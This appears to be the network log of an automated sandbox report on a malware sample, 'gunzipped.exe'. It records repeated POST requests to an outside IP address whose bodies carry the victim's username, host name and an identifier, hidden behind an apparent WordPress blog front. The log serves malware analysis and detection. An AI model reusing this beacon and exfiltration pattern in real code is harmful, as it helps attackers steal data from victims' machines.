                                              Apr 26, 2024 04:57:16.302445889 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:16.302654028 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:16.302778959 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:16.302870989 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:16.303112030 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.44974345.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:16.639663935 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:16.828258991 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:17.695516109 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:16 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:17.695570946 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:17.695606947 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: UTF-8" />
                                              Apr 26, 2024 04:57:17.695663929 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:17.704400063 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:17.704700947 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:17.704804897 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:17.704909086 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:17.705291986 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:17.705385923 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.44974445.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:18.033252001 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:18.220884085 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:19.100035906 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:18 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:19.100183964 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:19.107551098 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:19.107820988 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:19.107978106 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:19.108160019 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:19.108257055 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:19.108298063 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:19.108381033 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 26, 2024 04:57:19.108422041 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.44974545.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:19.622306108 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:19.809474945 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:20.685904026 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:19 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:20.686014891 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:20.686095953 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:20.693898916 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:20.694194078 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:20.694323063 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:20.694431067 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:20.694722891 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:20.694843054 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:20.694936037 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.44974645.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:21.056286097 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:21.244206905 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:22.132865906 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:21 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:22.132925987 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:22.132961988 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:22.140810966 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:22.141139984 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:22.141222000 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:22.141365051 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:22.141568899 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:22.141647100 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:22.141685009 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.44974745.77.223.48807328C:\Users\user\Desktop\gunzipped.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 26, 2024 04:57:22.484752893 CEST238OUTPOST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:22.673417091 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:23.609919071 CEST215INHTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:22 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:23.610285044 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                              Data Ascii: <!DOCTYPE html><html
                                              Apr 26, 2024 04:57:23.610569000 CEST12INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22
                                              Data Ascii: lang="en-US"
                                              Apr 26, 2024 04:57:23.610644102 CEST25INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
